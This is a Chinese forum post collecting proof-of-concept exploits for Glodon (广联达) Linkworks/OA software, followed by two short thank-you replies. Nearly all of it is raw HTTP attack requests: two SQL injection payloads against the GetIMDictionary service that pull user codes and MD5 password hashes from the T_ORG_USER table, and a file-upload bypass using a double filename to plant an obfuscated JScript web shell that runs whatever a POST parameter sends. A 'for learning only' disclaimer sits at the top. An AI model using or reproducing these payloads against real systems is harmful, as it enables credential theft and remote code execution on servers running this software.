广联达漏洞 PoC 整理

吉沃运营专员

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！

广联达 Linkworks GetIMDictionary SQL 注入漏洞

1. POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
   
2. Host:
   
3. Content-Type: application/x-www-form-urlencoded
   
4. key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

复制代码

广联达 OA 后台文件上传漏洞

1. POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
   
2. Host: 10.10.10.1:8888
   
3. X-Requested-With: Ext.basex
   
4. Accept: text/html, application/xhtml+xml, image/jxr, */*
   
5. Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
   
6. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
   
7. Accept-Encoding: gzip, deflate
   
8. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
   
9. Accept: */*
   
10. Origin: http://10.10.10.1
    
11. Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
    
12. Cookie:
    
13. Connection: close
    
14. Content-Length: 421
    
15. 
    
16. ------WebKitFormBoundaryFfJZ4PlAZBixjELj
    
17. Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
    
18. Content-Type: application/text
    
19. 
    
20. <%@ Page Language="Jscript" Debug=true%>
    
21. <%
    
22. var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
    
23. var GFMA=Request.Form("qmq1");
    
24. var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
    
25. eval(GFMA, ONOQ);
    
26. %>
    
27. 
    
28. ------WebKitFormBoundaryFfJZ4PlAZBixjELj--

复制代码

广联达 OA SQL 注入漏洞

1. POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
   
2. Host: xxx.com
   
3. Upgrade-Insecure-Requests: 1
   
4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
   
5. Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
   
6. Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
   
7. Accept-Encoding: gzip, deflate
   
8. Accept-Language: zh-CN,zh;q=0.9
   
9. Cookie:
   
10. Connection: close
    
11. Content-Type: application/x-www-form-urlencoded
    
12. Content-Length: 88
    
13. 
    
14. dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

复制代码

hackms

感谢分享

xulongzhuiyi

都是很SQL 漏洞